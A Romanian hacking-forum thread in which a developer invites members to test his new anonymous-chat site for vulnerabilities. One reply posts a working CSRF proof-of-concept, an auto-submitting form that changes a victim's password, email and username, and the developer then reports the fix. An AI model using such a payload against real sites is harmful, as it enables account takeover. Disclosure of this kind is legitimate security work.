aleee Posted April 7, 2015 Report Posted April 7, 2015 Salut,Am terminat de realizat un proiect personal pe care as vrea sa il 'testez' putin inainte de a ii da drumul.Despre ce este vorba? Pe scurt: anonymous chat. Practic iti faci cont si dupa aceea unele persoane 'anonymous' vor comunica cu tine .Site-ul se bazeaza pe websockets.Serverul de ws este scris in nodejs iar restul php+mysql.Cum sa testezi? Te autentifici din browser si dupa aceea te conectezi pe pagina ta de profil cu alt browser sau incognito.Deci... Daca va puteti uita peste, poate gasiti niste vulnerabilitati (puteti face orice, dupa voi sterge tot db-ul, respectiv conturile).Dovada: www.chatlike.me/rst.txtDaca sunt intrebari, sfaturi le astept aici.Multumesc,Alexandru Quote
askvrit Posted April 7, 2015 Report Posted April 7, 2015 Chiar imi place cum arata siteul, nu pare vulnerabil Quote
SimpluAlaSmecher Posted April 7, 2015 Report Posted April 7, 2015 Aplicatia nu este configurat?: Dezvoltatorii acestei aplica?ii nu au configurat corect aplica?ia pentru Conectare cu Facebook.Pai ce facem, uitam sa scoatem modul de test?----Si, Ratchet nu servesti? Quote
Kay97 Posted April 7, 2015 Report Posted April 7, 2015 Design simplu, dar atr?g?tor. PM me dac? dore?ti s? fie tradus în Italian?, gratis, evident. Quote
aleee Posted April 7, 2015 Author Report Posted April 7, 2015 @Kay97 - Da, mersi anticipat ... zilele astea o sa pun totul la punct si o sa iti trimit un fisier cu lang. Quote
yo20063 Posted April 7, 2015 Report Posted April 7, 2015 (edited) <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF</H2> <form method="POST" name="form0" action="http://www.chatlike.me/user/edit-account"> <input type="hidden" name="password" value="password"/> <input type="hidden" name="email" value="test123@test.com"/> <input type="hidden" name="username" value="test"/> <input type="hidden" name="name" value="test"/> <input type="hidden" name="submit-edit-account" value="true"/> </form> </body> </html>//scuze ca ti-am luat contul test, ai username baubau si aceeasi parola la el, daca il vrei inapoi//Cu placere, cu ocazia asta pune-ti si un frame buster Edited April 7, 2015 by yo20063 Quote
aleee Posted April 7, 2015 Author Report Posted April 7, 2015 (edited) @yo20063 - Rezolv acum. Mersi! Edit:- csrf: rezolvat.- frame buster: rezolvat. Edited April 7, 2015 by aleee Quote
rotube Posted April 7, 2015 Report Posted April 7, 2015 App Not Setup: The developers of this app have not set up this app properly for Facebook Login. aplicatia facebook nu iti merge Quote
BaiatFinutz Posted April 7, 2015 Report Posted April 7, 2015 Simplu si intuitiv.Daca ai nevoie cu siteul sau traducere in spaniola anuntama.Bafta Quote
askvrit Posted April 7, 2015 Report Posted April 7, 2015 Simplu si intuitiv.Daca ai nevoie cu siteul sau traducere in spaniola anuntama.Bafta Tu nu stii romana si vrei sa traduci in spaniola )) Quote
aleee Posted April 8, 2015 Author Report Posted April 8, 2015 @BaiatFinutz - mersi! Voi tine cont! Quote
Wav3 Posted April 8, 2015 Report Posted April 8, 2015 (edited) Dupa ce criterii se face cautarea? Dau Search fara sa scriu nimic si imi afiseaza rezultatele in alta ordine de fiecare data.EDIT #2: Am inteles, se face Shuffle daca nu scriu nimic.EDIT #1: Pune si tu un 404 sau redirect ceva atunci cand nu exista profilul: http://www.chatlike.me/profile/Wav3aaaaaa Edited April 8, 2015 by Wav3 Quote
BaiatFinutz Posted April 10, 2015 Report Posted April 10, 2015 @askvritNu stiu romana finca sunt in spania de la 6 anii Quote
aleee Posted April 13, 2015 Author Report Posted April 13, 2015 Bun... am zis sa nu mai deschid alt topic pe aceasta tema asa ca voi intreba aici. Stiti un site de unde pot cumpara traffic? Daca se poate sa selectez eu pe ce nisa vreau... Mersi. Quote
askvrit Posted April 13, 2015 Report Posted April 13, 2015 @aleee eu nu am fost atent de la inceput. Dar azi observ ca vorbesti de chat anonim in care te logezi cu contul de facebook. Daca nu te logezi cu facebook trebuie sa faci un cont de pe care trebuie sa te logezi.Anonim=Nologs! Pricepi ideea? A n o n i m .prin anonim poate se refera ca nu stii cu cine vorbesti, gen connected 2 me Quote
aleee Posted April 14, 2015 Author Report Posted April 14, 2015 @tqcsu - gandesti prea 1337 .Are cineva un raspuns legat la ce am intrebat mai sus? Quote